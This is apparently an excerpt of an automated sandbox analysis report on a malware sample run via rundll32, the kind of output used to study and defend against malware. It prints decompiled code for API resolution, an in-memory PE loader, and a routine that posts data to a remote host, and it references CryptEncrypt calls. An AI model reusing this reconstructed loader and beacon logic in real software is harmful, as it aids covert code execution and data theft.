2647->2644 2713 11a25e0 LoadLibraryExA 2714 11a2608 2713->2714 2715 11a260c GetProcAddress 2713->2715 2716 11a2627 VirtualProtect VirtualProtect 2715->2716 2716->2714 2649 1164528 LoadLibraryW GetProcAddress

    Executed Functions

    Function 048511A0, Relevance: 45.6, APIs: 13, Strings: 13, Instructions: 69libraryloaderCOMMON
    Download Yara Rule

    Control-flow Graph

    C-Code - Quality: 100%
    			E048511A0() {
				struct HINSTANCE__* _v8;
				struct HINSTANCE__* _v12;
				void* _t32;
				void* _t40;

				_v8 = LoadLibraryA("msvcrt.dll");
				_v12 = LoadLibraryA("kernel32.dll");
				 *0x4853010 = GetProcAddress(_v8, "realloc");
				 *0x4853020 = GetProcAddress(_v8, "exit");
				 *0x4853024 = GetProcAddress(_v8, "strncmp");
				 *0x4853008 = GetProcAddress(_v8, "free");
				 *0x485300c = GetProcAddress(_v8, "malloc");
				 *0x4853014 = GetProcAddress(_v12, "CreateDirectoryA");
				 *0x4853018 = GetProcAddress(_v12, "CreateProcessA");
				 *0x485301c = GetProcAddress(_v12, "DeleteFileA");
				 *0x4853028 = GetProcAddress(_v8, "memset");
				 *0x4853030 = GetProcAddress(_v8, "memcpy");
				 *0x485302c = GetProcAddress(_v8, "strstr"); // executed
				E04851040(); // executed
				_t32 = E048510B0(_t40); // executed
				return _t32;
			}







    0x048511b1
    0x048511bf
    0x048511d1
    0x048511e5
    0x048511f9
    0x0485120d
    0x04851221
    0x04851235
    0x04851249
    0x0485125d
    0x04851271
    0x04851285
    0x04851299
    0x0485129e
    0x048512a3
    0x048512ab

    APIs
    • LoadLibraryA.KERNEL32(msvcrt.dll), ref: 048511AB
    • LoadLibraryA.KERNEL32(kernel32.dll), ref: 048511B9
    • GetProcAddress.KERNEL32(00000001,realloc), ref: 048511CB
    • GetProcAddress.KERNEL32(00000001,exit), ref: 048511DF
    • GetProcAddress.KERNEL32(00000001,strncmp), ref: 048511F3
    • GetProcAddress.KERNEL32(00000001,free), ref: 04851207
    • GetProcAddress.KERNEL32(00000001,malloc), ref: 0485121B
    • GetProcAddress.KERNEL32(?,CreateDirectoryA), ref: 0485122F
    • GetProcAddress.KERNEL32(?,CreateProcessA), ref: 04851243
    • GetProcAddress.KERNEL32(?,DeleteFileA), ref: 04851257
    • GetProcAddress.KERNEL32(00000001,memset), ref: 0485126B
    • GetProcAddress.KERNEL32(00000001,memcpy), ref: 0485127F
    • GetProcAddress.KERNEL32(00000001,strstr), ref: 04851293
      • Part of subcall function 04851040: CreateDirectoryA.KERNELBASE(?,00000000,?,?,?,?,?,?,048512A3), ref: 0485108A
      • Part of subcall function 048510B0: Sleep.KERNEL32(00003A98), ref: 04851166
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.665004317.0000000004851000.00000020.00000001.sdmp, Offset: 04850000, based on PE: true
    • Associated: 00000003.00000002.664819390.0000000004850000.00000004.00000001.sdmp Download File
    • Associated: 00000003.00000002.666866498.0000000004852000.00000002.00000001.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_4850000_rundll32.jbxd
    Similarity
    • API ID: AddressProc$LibraryLoad$CreateDirectorySleep
    • String ID: CreateDirectoryA$CreateProcessA$DeleteFileA$exit$free$kernel32.dll$malloc$memcpy$memset$msvcrt.dll$realloc$strncmp$strstr
    • API String ID: 2158191583-3107153655
    • Opcode ID: 1cd38dbcaeb0a4ccf2370516527b8a6636543a49cb01bc176f0e33b993be3a31
    • Instruction ID: 31db8aa28d8badaaeed6238bb77f80025b92081a2d471e95a5bad477d22d040e
    • Opcode Fuzzy Hash: 1cd38dbcaeb0a4ccf2370516527b8a6636543a49cb01bc176f0e33b993be3a31
    • Instruction Fuzzy Hash: 8521A5B9A81304EF9710FFA0ED4996B7B79FA486817100E95EE0192710DE7CAE00EF60
    Uniqueness

    Uniqueness Score: -1.00%

    Function 011B1B50, Relevance: 22.8, APIs: 15, Instructions: 331COMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 84 11b1b50-11b1b77 call 11b1270 87 11b1b79-11b1b7b 84->87 88 11b1b80-11b1b91 84->88 89 11b1f6a-11b1f6d 87->89 90 11b1b93-11b1ba0 SetLastError 88->90 91 11b1ba5-11b1bc0 call 11b1270 88->91 90->89 94 11b1bc9-11b1bde 91->94 95 11b1bc2-11b1bc4 91->95 96 11b1bf2-11b1bff 94->96 97 11b1be0-11b1bed SetLastError 94->97 95->89 98 11b1c13-11b1c1c 96->98 99 11b1c01-11b1c0e SetLastError 96->99 97->89 100 11b1c1e-11b1c2b SetLastError 98->100 101 11b1c30-11b1c51 98->101 99->89 100->89 102 11b1c65-11b1c6f 101->102 103 11b1c71-11b1c78 102->103 104 11b1ca7-11b1ce2 GetNativeSystemInfo 102->104 105 11b1c7a-11b1c86 103->105 106 11b1c88-11b1c94 103->106 107 11b1cf6-11b1d15 VirtualAlloc 104->107 108 11b1ce4-11b1cf1 SetLastError 104->108 111 11b1c97-11b1c9d 105->111 106->111 109 11b1d42-11b1d5a GetProcessHeap HeapAlloc 107->109 110 11b1d17-11b1d31 VirtualAlloc 107->110 108->89 113 11b1d7c-11b1d92 109->113 114 11b1d5c-11b1d77 VirtualFree SetLastError 109->114 110->109 112 11b1d33-11b1d3d SetLastError 110->112 115 11b1c9f-11b1ca2 111->115 116 11b1ca5 111->116 112->89 117 11b1d9d 113->117 118 11b1d94-11b1d9b 113->118 114->89 115->116 116->102 120 11b1da4-11b1def call 11b1270 117->120 118->120 123 11b1dfb-11b1e60 VirtualAlloc call 11b10d0 call 11b12a0 120->123 124 11b1df1 120->124 132 11b1e6c-11b1e7d 123->132 133 11b1e62 123->133 125 11b1f5c-11b1f68 call 11b2120 124->125 125->89 134 11b1e7f-11b1e95 call 11b17b0 132->134 135 11b1e97-11b1e9a 132->135 133->125 137 11b1ea1-11b1eaf call 11b18c0 134->137 135->137 141 11b1ebb-11b1ec9 call 11b15b0 137->141 142 11b1eb1 137->142 145 11b1ecb 141->145 146 11b1ed5-11b1ee3 call 11b1730 141->146 142->125 145->125 149 11b1ee9-11b1ef2 146->149 150 11b1ee5 146->150 151 11b1f4d-11b1f50 149->151 152 11b1ef4-11b1efb 149->152 150->125 155 11b1f57-11b1f5a 151->155 153 11b1f3a-11b1f48 152->153 154 11b1efd-11b1f13 call 4851010 152->154 156 11b1f4b 153->156 157 11b1f16-11b1f1d 154->157 155->89 155->125 156->155 158 11b1f1f-11b1f2a SetLastError 157->158 159 11b1f2e-11b1f38 157->159 158->125 159->156
    C-Code - Quality: 90%
    			E011B1B50(intOrPtr __ecx, signed short* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				void* _v8;
				intOrPtr* _v12;
				void* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				signed short* _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				long _v44;
				void* _v48;
				void* _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v100;
				char _v104;
				void* _t184;
				void* _t195;
				void* _t202;
				void* _t205;
				void* _t206;
				void* _t223;
				intOrPtr _t320;

				_v20 = __ecx;
				_v8 = 0;
				_v40 = 0;
				if(E011B1270(_v20, _a8, 0x40) != 0) {
					_v28 = _a4;
					if(( *_v28 & 0x0000ffff) == 0x5a4d) {
						if(E011B1270(_v20, _a8, _v28[0x1e] + 0xf8) != 0) {
							_v12 = _a4 + _v28[0x1e];
							if( *_v12 == 0x4550) {
								_t19 = _v12 + 4; // 0x3
								if(( *_t19 & 0x0000ffff) == 0x14c) {
									_t21 = _v12 + 0x38; // 0x0
									if(( *_t21 & 0x00000001) == 0) {
										_t23 = _v12 + 0x14; // 0x0
										_t26 = ( *_t23 & 0x0000ffff) + 0x18; // 0x11b4018
										_v24 = _v12 + _t26;
										_t29 = _v12 + 0x38; // 0x0
										_v60 =  *_t29;
										_v32 = 0;
										while(1) {
											_t37 = _v12 + 6; // 0x40000
											if(_v32 >= ( *_t37 & 0x0000ffff)) {
												break;
											}
											if( *((intOrPtr*)(_v24 + 0x10)) != 0) {
												_v36 =  *((intOrPtr*)(_v24 + 0xc)) +  *((intOrPtr*)(_v24 + 0x10));
											} else {
												_v36 =  *((intOrPtr*)(_v24 + 0xc)) + _v60;
											}
											if(_v36 > _v40) {
												_v40 = _v36;
											}
											_v32 = _v32 + 1;
											_v24 = _v24 + 0x28;
										}
										__imp__GetNativeSystemInfo( &_v104); // executed
										_t56 = _v12 + 0x50; // 0x70207369
										_t59 = _v100 - 1; // 0x70207368
										_v44 =  *_t56 + _t59 &  !(_v100 - 1);
										_t65 = _v100 - 1; // -1
										if(_v44 == (_v40 + _t65 &  !(_v100 - 1))) {
											_t70 = _v12 + 0x34; // 0x0
											_t184 = VirtualAlloc( *_t70, _v44, 0x3000, 4); // executed
											_v16 = _t184;
											if(_v16 != 0) {
												L26:
												_v8 = HeapAlloc(GetProcessHeap(), 8, 0x34);
												if(_v8 != 0) {
													 *((intOrPtr*)(_v8 + 4)) = _v16;
													_t83 = _v12 + 0x16; // 0x400000
													if(( *_t83 & 0x2000) == 0) {
														_v48 = 0;
													} else {
														_v48 = 1;
													}
													 *(_v8 + 0x14) = _v48;
													 *((intOrPtr*)(_v8 + 0x1c)) = _a12;
													 *((intOrPtr*)(_v8 + 0x20)) = _a16;
													 *((intOrPtr*)(_v8 + 0x24)) = _a20;
													 *((intOrPtr*)(_v8 + 0x28)) = _a24;
													 *((intOrPtr*)(_v8 + 0x30)) = _v100;
													_t105 = _v12 + 0x54; // 0x72676f72
													if(E011B1270(_v20, _a8,  *_t105) != 0) {
														_t109 = _v12 + 0x54; // 0x72676f72
														_t195 = VirtualAlloc(_v16,  *_t109, 0x1000, 4); // executed
														_v52 = _t195;
														_t113 = _v12 + 0x54; // 0x72676f72
														E011B10D0(_v52, _v28,  *_t113);
														 *_v8 = _v52 + _v28[0x1e];
														 *((intOrPtr*)( *_v8 + 0x34)) = _v16;
														_t202 = E011B12A0(_v20, _a4, _a8, _v12, _v8); // executed
														if(_t202 != 0) {
															_t131 = _v12 + 0x34; // 0x0
															_t320 =  *((intOrPtr*)( *_v8 + 0x34)) -  *_t131;
															_v56 = _t320;
															if(_t320 == 0) {
																 *((intOrPtr*)(_v8 + 0x18)) = 1;
															} else {
																 *((intOrPtr*)(_v8 + 0x18)) = E011B17B0(_v20, _v8, _v56);
															}
															_t205 = E011B18C0(_v20, _v8); // executed
															if(_t205 != 0) {
																_t206 = E011B15B0(_v20, _v8); // executed
																if(_t206 != 0) {
																	if(E011B1730(_v20, _v8) != 0) {
																		if( *((intOrPtr*)( *_v8 + 0x28)) == 0) {
																			 *(_v8 + 0x2c) = 0;
																			L52:
																			return _v8;
																		}
																		if( *(_v8 + 0x14) == 0) {
																			 *(_v8 + 0x2c) = _v16 +  *((intOrPtr*)( *_v8 + 0x28));
																			L50:
																			goto L52;
																		}
																		_v64 = _v16 +  *((intOrPtr*)( *_v8 + 0x28));
																		_v68 = _v64(_v16, 1, 0);
																		if(_v68 != 0) {
																			 *((intOrPtr*)(_v8 + 0x10)) = 1;
																			goto L50;
																		}
																		SetLastError(0x45a);
																		goto L53;
																	}
																	goto L53;
																}
																goto L53;
															}
															goto L53;
														}
														goto L53;
													} else {
														L53:
														E011B2120(_v20, _v8);
														return 0;
													}
												}
												VirtualFree(_v16, 0, 0x8000);
												SetLastError(0xe);
												return 0;
											}
											_t223 = VirtualAlloc(0, _v44, 0x3000, 4); // executed
											_v16 = _t223;
											if(_v16 != 0) {
												goto L26;
											}
											SetLastError(0xe);
											return 0;
										}
										SetLastError(0xc1);
										return 0;
									}
									SetLastError(0xc1);
									return 0;
								}
								SetLastError(0xc1);
								return 0;
							}
							SetLastError(0xc1);
							return 0;
						}
						return 0;
					}
					SetLastError(0xc1);
					return 0;
				}
				return 0;
			}




























    0x011b1b56
    0x011b1b59
    0x011b1b60
    0x011b1b77
    0x011b1b83
    0x011b1b91
    0x011b1bc0
    0x011b1bd2
    0x011b1bde
    0x011b1bf5
    0x011b1bff
    0x011b1c16
    0x011b1c1c
    0x011b1c33
    0x011b1c3a
    0x011b1c3e
    0x011b1c44
    0x011b1c47
    0x011b1c4a
    0x011b1c65
    0x011b1c68
    0x011b1c6f
    0x00000000
    0x00000000
    0x011b1c78
    0x011b1c94
    0x011b1c7a
    0x011b1c83
    0x011b1c83
    0x011b1c9d
    0x011b1ca2
    0x011b1ca2
    0x011b1c59
    0x011b1c62
    0x011b1c62
    0x011b1cab
    0x011b1cb4
    0x011b1cba
    0x011b1cc8
    0x011b1cd1
    0x011b1ce2
    0x011b1d04
    0x011b1d08
    0x011b1d0e
    0x011b1d15
    0x011b1d42
    0x011b1d53
    0x011b1d5a
    0x011b1d82
    0x011b1d88
    0x011b1d92
    0x011b1d9d
    0x011b1d94
    0x011b1d94
    0x011b1d94
    0x011b1daa
    0x011b1db3
    0x011b1dbc
    0x011b1dc5
    0x011b1dce
    0x011b1dd7
    0x011b1ddd
    0x011b1def
    0x011b1e05
    0x011b1e0d
    0x011b1e13
    0x011b1e19
    0x011b1e25
    0x011b1e39
    0x011b1e43
    0x011b1e59
    0x011b1e60
    0x011b1e77
    0x011b1e77
    0x011b1e7a
    0x011b1e7d
    0x011b1e9a
    0x011b1e7f
    0x011b1e92
    0x011b1e92
    0x011b1ea8
    0x011b1eaf
    0x011b1ec2
    0x011b1ec9
    0x011b1ee3
    0x011b1ef2
    0x011b1f50
    0x011b1f57
    0x00000000
    0x011b1f57
    0x011b1efb
    0x011b1f48
    0x011b1f4b
    0x00000000
    0x011b1f4b
    0x011b1f08
    0x011b1f16
    0x011b1f1d
    0x011b1f31
    0x00000000
    0x011b1f31
    0x011b1f24
    0x00000000
    0x011b1f24
    0x00000000
    0x011b1ee5
    0x00000000
    0x011b1ecb
    0x00000000
    0x011b1eb1
    0x00000000
    0x011b1df1
    0x011b1f5c
    0x011b1f63
    0x00000000
    0x011b1f68
    0x011b1def
    0x011b1d67
    0x011b1d6f
    0x00000000
    0x011b1d75
    0x011b1d24
    0x011b1d2a
    0x011b1d31
    0x00000000
    0x00000000
    0x011b1d35
    0x00000000
    0x011b1d3b
    0x011b1ce9
    0x00000000
    0x011b1cef
    0x011b1c23
    0x00000000
    0x011b1c29
    0x011b1c06
    0x00000000
    0x011b1c0c
    0x011b1be5
    0x00000000
    0x011b1beb
    0x00000000
    0x011b1bc2
    0x011b1b98
    0x00000000
    0x011b1b9e
    0x00000000

    APIs
      • Part of subcall function 011B1270: SetLastError.KERNEL32(0000000D,?,?,011B1B75,011B1025,00000040), ref: 011B1281
    • SetLastError.KERNEL32(000000C1,011B1025,00000040), ref: 011B1B98
    Memory Dump Source
    • Source File: 00000003.00000002.662633575.00000000011B1000.00000020.00000001.sdmp, Offset: 011B0000, based on PE: true
    • Associated: 00000003.00000002.662614711.00000000011B0000.00000004.00000001.sdmp Download File
    • Associated: 00000003.00000002.662646662.00000000011B3000.00000002.00000001.sdmp Download File
    • Associated: 00000003.00000002.662686050.00000000011B4000.00000004.00000001.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_11b0000_rundll32.jbxd
    Similarity
    • API ID: ErrorLast
    • String ID:
    • API String ID: 1452528299-0
    • Opcode ID: 12b0e6a17476fd38cb820aeb16230bea20be3a3774c4f56e493efd9025ae4ed3
    • Instruction ID: 192dff59822bd5d366d81e63a860fd4192e890f47ad625c6df332ec8d88478e2
    • Opcode Fuzzy Hash: 12b0e6a17476fd38cb820aeb16230bea20be3a3774c4f56e493efd9025ae4ed3
    • Instruction Fuzzy Hash: E2E1D674A10209EFDB08CF98D9E4AEEBBB1BF48304F118559E915AB385D730AE85CF51
    Uniqueness

    Uniqueness Score: -1.00%

    Function 04851640, Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 212networkCOMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 161 4851640-48516c9 call 4851a20 call 4851470 168 48516cf-48516eb 161->168 168->168 169 48516ed-4851757 wsprintfA WSAStartup 168->169 170 4851760-48517da socket gethostbyname htons connect 169->170 171 4851759-485175b 169->171 173 48517e3-4851802 170->173 174 48517dc-48517de 170->174 172 48519f6-4851a03 call 4851a04 171->172 175 4851808-4851824 173->175 174->172 175->175 177 4851826-485185e send 175->177 179 4851864-48518a2 177->179 180 48519dd-48519f0 closesocket WSACleanup 177->180 182 48518ac-48518d4 recv 179->182 180->172 183 48519c3-48519db 182->183 184 48518da-48518e1 182->184 183->180 185 4851916 184->185 186 48518e3-4851914 call 48513a0 184->186 188 4851920-485193e 185->188 186->188 190 4851981-48519be 188->190 191 4851940-485197b 188->191 190->182 191->190
    APIs
    • wsprintfA.USER32 ref: 0485173A
    • WSAStartup.WS2_32(00000102,?), ref: 0485174F
    • socket.WS2_32(00000002,00000001,00000006), ref: 04851766
    • gethostbyname.WS2_32(?), ref: 04851779
    • htons.WS2_32(?), ref: 0485178D
    • connect.WS2_32(?,?,00000010), ref: 048517D2
    • send.WS2_32(?,?,?,00000000), ref: 04851854
    • recv.WS2_32(?,?,00000BB8,00000000), ref: 048518C1
    Strings
    • POST %s HTTP/1.1Host: %sPragma: no-cacheContent-Length: %d%s, xrefs: 0485172E
    • ping, xrefs: 04851657
    Memory Dump Source
    • Source File: 00000003.00000002.665004317.0000000004851000.00000020.00000001.sdmp, Offset: 04850000, based on PE: true
    • Associated: 00000003.00000002.664819390.0000000004850000.00000004.00000001.sdmp Download File
    • Associated: 00000003.00000002.666866498.0000000004852000.00000002.00000001.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_4850000_rundll32.jbxd
    Similarity
    • API ID: Startupconnectgethostbynamehtonsrecvsendsocketwsprintf
    • String ID: POST %s HTTP/1.1Host: %sPragma: no-cacheContent-Length: %d%s$ping
    • API String ID: 1466141387-1232505173
    • Opcode ID: abd8a5559fa4e9926b4bd933dea71345106d599176918da7ebd5cac41c17645b
    • Instruction ID: b902c569344a0c09ae7c169a3f1b4a50396d150d24cec4c5e5f08ec9e8711290
    • Opcode Fuzzy Hash: abd8a5559fa4e9926b4bd933dea71345106d599176918da7ebd5cac41c17645b
    • Instruction Fuzzy Hash: 4BB1F474D042A89BDB20DF68DD84BD9B7B5AF48304F008AC9E58DE7245DBB46AC4CF51
    Uniqueness

    Uniqueness Score: -1.00%

    Function 011A1030, Relevance: 18.4, APIs: 12, Instructions: 362libraryloaderCOMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 194 11a1030-11a1075 LoadLibraryW GetProcAddress call 11a1b30 197 11a107e-11a108f 194->197 198 11a1077-11a1079 194->198 200 11a10a3-11a10be call 11a1b30 197->200 201 11a1091-11a109e SetLastError 197->201 199 11a148d-11a1490 198->199 204 11a10c0-11a10c2 200->204 205 11a10c7-11a10dc 200->205 201->199 204->199 206 11a10de-11a10eb SetLastError 205->206 207 11a10f0-11a10fd 205->207 206->199 208 11a10ff-11a110c SetLastError 207->208 209 11a1111-11a111a 207->209 208->199 210 11a112e-11a114f 209->210 211 11a111c-11a1129 SetLastError 209->211 212 11a1163-11a116d 210->212 211->199 213 11a116f-11a1176 212->213 214 11a11a5-11a11d5 GetNativeSystemInfo call 11a18d0 * 2 212->214 215 11a1178-11a1184 213->215 216 11a1186-11a1192 213->216 225 11a11e9-11a120c call 11a1800 214->225 226 11a11d7-11a11e4 SetLastError 214->226 219 11a1195-11a119b 215->219 216->219 221 11a119d-11a11a0 219->221 222 11a11a3 219->222 221->222 222->212 228 11a120e-11a121f call 11a1800 225->228 229 11a123d-11a1255 GetProcessHeap RtlAllocateHeap 225->229 226->199 234 11a1222-11a122c 228->234 230 11a127b-11a1291 229->230 231 11a1257-11a1276 SetLastError 229->231 232 11a129c 230->232 233 11a1293-11a129a 230->233 231->199 235 11a12a3-11a1300 call 11a1b30 232->235 233->235 234->229 236 11a122e-11a1238 SetLastError 234->236 240 11a1302 235->240 241 11a1307-11a1370 call 11a1800 call 11a1980 call 11a1b50 235->241 236->199 242 11a147f-11a148b call 11a16c0 240->242 250 11a1372 241->250 251 11a1377-11a1388 241->251 242->199 250->242 252 11a138a-11a13a0 call 11a2090 251->252 253 11a13a2-11a13a5 251->253 255 11a13ac-11a13ba call 11a21a0 252->255 253->255 259 11a13bc 255->259 260 11a13c1-11a13cf call 11a1e80 255->260 259->242 263 11a13d1 260->263 264 11a13d6-11a13e4 call 11a2010 260->264 263->242 267 11a13eb-11a13f4 264->267 268 11a13e6 264->268 269 11a1470-11a1473 267->269 270 11a13f6-11a13fd 267->270 268->242 273 11a147a-11a147d 269->273 271 11a13ff-11a144e GetPEB call 11b1000 270->271 272 11a145d-11a146b 270->272 275 11a1451-11a145b 271->275 274 11a146e 272->274 273->199 274->273 275->274
    APIs
    • LoadLibraryW.KERNEL32(011A4054,011A4040), ref: 011A1047
    • GetProcAddress.KERNEL32(00000000), ref: 011A104E
      • Part of subcall function 011A1B30: SetLastError.KERNEL32(0000000D,?,011A1070,?,00000040), ref: 011A1B3D
    • SetLastError.KERNEL32(000000C1), ref: 011A1096
    Memory Dump Source
    • Source File: 00000003.00000002.662490371.00000000011A1000.00000020.00000001.sdmp, Offset: 011A1000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_11a1000_rundll32.jbxd
    Similarity
    • API ID: ErrorLast$AddressLibraryLoadProc
    • String ID:
    • API String ID: 1866314245-0
    • Opcode ID: a13422e5fd71005870062d6bc94ed78f1339e51adbe0aa8c75cb91b0db5b0a2d
    • Instruction ID: b635f8b3e635fff1d3250391d6c50124b43ae7d0f39efc9309cb47f0b06ee3dd
    • Opcode Fuzzy Hash: a13422e5fd71005870062d6bc94ed78f1339e51adbe0aa8c75cb91b0db5b0a2d
    • Instruction Fuzzy Hash: 48F1DDB8E00209EFDB08CF98D984AAEBBB1FF48314F608559E915AB341D775EE41CB51
    Uniqueness

    Uniqueness Score: -1.00%

    Function 10001140, Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 258libraryCOMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 280 10001140-1000114f 281 10001435-1000143e 280->281 282 10001155-10001158 280->282 282->281 283 1000115e-10001175 LoadLibraryW 282->283 284 1000123a 283->284 285 1000117b-10001186 283->285 286 1000123e-10001245 284->286 285->284 287 1000118c-100011aa 285->287 288 10001329 286->288 289 1000124b-10001258 286->289 287->284 290 100011b0-100011b5 287->290 291 1000132b-1000134f call 10001440 288->291 289->288 292 1000125e-1000127c 289->292 293 100011b9-100011d9 290->293 315 10001351-1000135b 291->315 316 1000137e-1000139c 291->316 292->288 295 10001282-10001287 292->295 296 10001201-10001209 293->296 297 100011db-100011dd 293->297 301 1000128b-100012ab 295->301 298 10001215-10001232 296->298 299 1000120b-1000120f 296->299 302 100011e3-100011ec 297->302 298->293 304 10001234-10001238 298->304 299->298 303 1000130a-10001318 299->303 305 100012d3-100012db 301->305 306 100012ad-100012af 301->306 302->296 307 100011ee-100011f4 302->307 303->286 304->284 310 100012e3-10001300 305->310 311 100012dd-100012e1 305->311 309 100012b5-100012be 306->309 307->296 312 100011f6-100011ff 307->312 309->305 317 100012c0-100012c6 309->317 310->301 314 10001302-10001308 310->314 311->310 313 1000131d-10001327 311->313 312->296 312->302 313->291 314->288 320 10001360-10001362 315->320 316->281 321 100013a2-100013a6 316->321 317->305 318 100012c8-100012d1 317->318 318->305 318->309 320->316 322 10001364-10001378 320->322 323 100013a8-100013ac 321->323 324 100013be-100013cb 321->324 322->281 322->316 325 100013b0-100013bc 323->325 326 100013cd-100013ed 324->326 327 100013ef-10001409 324->327 325->324 325->325 326->327 329 1000140c-1000140e 327->329 329->281 330 10001410-10001434 329->330
    APIs
    • LoadLibraryW.KERNEL32(advapi32.dll,00000000,?,768FFF80,00000000,?,?,?,?,10001910,mzhN!<iB1VQsqma,00000001,00000000,?), ref: 10001163
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.668407668.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000003.00000002.668390582.0000000010000000.00000002.00020000.sdmp Download File
    • Associated: 00000003.00000002.668432316.0000000010002000.00000002.00020000.sdmp Download File
    • Associated: 00000003.00000002.668446107.0000000010003000.00000004.00020000.sdmp Download File
    • Associated: 00000003.00000002.668456462.0000000010004000.00000002.00020000.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
    Similarity
    • API ID: LibraryLoad
    • String ID: CryptAcquireContextW$CryptEncrypt$CryptImportKey$MZ$advapi32.dll
    • API String ID: 1029625771-2099056292
    • Opcode ID: 8be17151d487c284eccf1f61c66e01e235dd7159d25684441548e50fe222385c
    • Instruction ID: f1e3da2b060832eca0575a2289e7c1b66ec671b800c50b1afc0d0a00f9ebe04d
    • Opcode Fuzzy Hash: 8be17151d487c284eccf1f61c66e01e235dd7159d25684441548e50fe222385c
    • Instruction Fuzzy Hash: 4F9105706083428FE714CF15C8C0AABBBE9EFC97C8F10456DE8859B30AD632D906CB91
    Uniqueness

    Uniqueness Score: -1.00%

    Function 10001530, Relevance: 54.6, APIs: 4, Strings: 27, Instructions: 320COMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 0 10001530-1000153a call 10001100 3 10001547-1000165b call 100010e0 0->3 4 1000153c-10001541 ExitProcess 0->4 7 100016da 3->7 8 1000165d-10001660 3->8 10 100016dc-100016e1 7->10 8->7 9 10001662-10001667 8->9 11 100016d6-100016d8 9->11 12 10001669-10001672 9->12 13 100016f1-100016fc 10->13 14 100016e3-100016e7 10->14 11->7 11->8 15 100016c1-100016cb 12->15 16 10001674-1000167b 12->16 18 10001707-10001729 13->18 19 100016fe-10001702 13->19 17 100017a7-100017bd call 100010e0 14->17 24 100016d4 15->24 25 100016cd-100016d2 15->25 21 1000167d-10001682 16->21 30 100017c3-100017c8 17->30 31 1000185f 17->31 22 1000172b-10001730 18->22 23 1000179f 18->23 19->17 21->15 28 10001684-1000168b 21->28 29 10001734-10001752 22->29 23->17 24->11 25->24 26 100016ec-100016ef 25->26 26->10 32 10001699-100016a3 28->32 33 1000168d-10001691 28->33 34 10001754-1000175d 29->34 30->31 35 100017ce-100017d3 30->35 37 10001861-100018ab call 10001440 * 2 31->37 38 100016b2-100016b5 32->38 39 100016a5-100016a9 32->39 33->32 36 10001693-10001696 33->36 40 1000176e-10001774 34->40 41 1000175f-10001763 34->41 42 10001842-10001844 35->42 43 100017d5-100017de 35->43 36->32 68 100018c3-1000190b atoi VirtualAlloc call 10001140 37->68 69 100018ad-100018bc 37->69 38->15 46 100016b7-100016bf 38->46 39->38 45 100016ab-100016ae 39->45 48 10001780-1000179d 40->48 49 10001776-1000177a 40->49 41->40 47 10001765-1000176c 41->47 42->30 51 1000184a 42->51 52 100017e0-100017e7 43->52 53 1000182d-10001836 43->53 45->38 46->15 46->21 47->34 47->40 48->23 48->29 49->48 50 1000184c-10001855 49->50 50->17 51->31 57 100017e9-100017ee 52->57 55 10001840 53->55 56 10001838-1000183e 53->56 55->42 56->55 59 1000185a-1000185d 56->59 57->53 60 100017f0-100017f7 57->60 59->37 62 10001805-1000180f 60->62 63 100017f9-100017fd 60->63 66 10001811-10001815 62->66 67 1000181e-10001821 62->67 63->62 65 100017ff-10001802 63->65 65->62 66->67 71 10001817-1000181a 66->71 67->53 70 10001823-1000182b 67->70 73 10001910-10001915 68->73 69->68 70->53 70->57 71->67 74 10001917-10001937 atoi call 10001140 73->74 75 10001939 73->75 74->75 78 1000193b-10001944 74->78 75->78
    C-Code - Quality: 68%
    			E10001530() {
				char _v3;
				char _v4;
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				char _v9;
				char _v10;
				char _v11;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				char _v16;
				char _v17;
				char _v18;
				char _v19;
				char _v20;
				char _v23;
				char _v24;
				char _v25;
				char _v26;
				char _v27;
				char _v28;
				char _v29;
				char _v30;
				char _v31;
				char _v32;
				char _v33;
				char _v34;
				char _v35;
				char _v36;
				char _v37;
				char _v38;
				char _v39;
				char _v40;
				char _v44;
				char _v45;
				char _v46;
				char _v47;
				char _v48;
				char _v49;
				char _v50;
				char _v51;
				char _v52;
				char _v53;
				char _v54;
				char _v55;
				char _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				char _v68;
				char _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				signed int _v88;
				void* _v92;
				void* _v96;
				signed int _v100;
				void* _v104;
				void* _v112;
				long _v116;
				intOrPtr* _t140;
				intOrPtr _t143;
				intOrPtr _t144;
				intOrPtr* _t146;
				intOrPtr* _t148;
				void* _t153;
				char* _t165;
				void* _t167;
				void* _t169;
				char* _t170;
				intOrPtr* _t173;
				intOrPtr* _t174;
				void* _t175;
				void* _t177;
				intOrPtr _t180;
				short* _t181;
				intOrPtr _t182;
				signed int _t185;
				signed int _t186;
				char _t193;
				short _t194;
				char _t195;
				short _t196;
				intOrPtr _t199;
				void* _t205;
				intOrPtr _t211;
				intOrPtr _t214;
				void* _t216;
				signed int _t225;
				void* _t227;
				signed int _t228;
				void* _t230;
				intOrPtr _t232;
				intOrPtr _t233;
				intOrPtr* _t234;
				void* _t235;
				char _t237;
				void* _t240;
				char _t243;
				intOrPtr _t247;
				intOrPtr* _t249;
				intOrPtr _t252;
				void* _t253;
				void* _t265;
				void* _t284;

				_t253 =  &_v100;
				if(E10001100() != 0) {
					ExitProcess(0xffffe678);
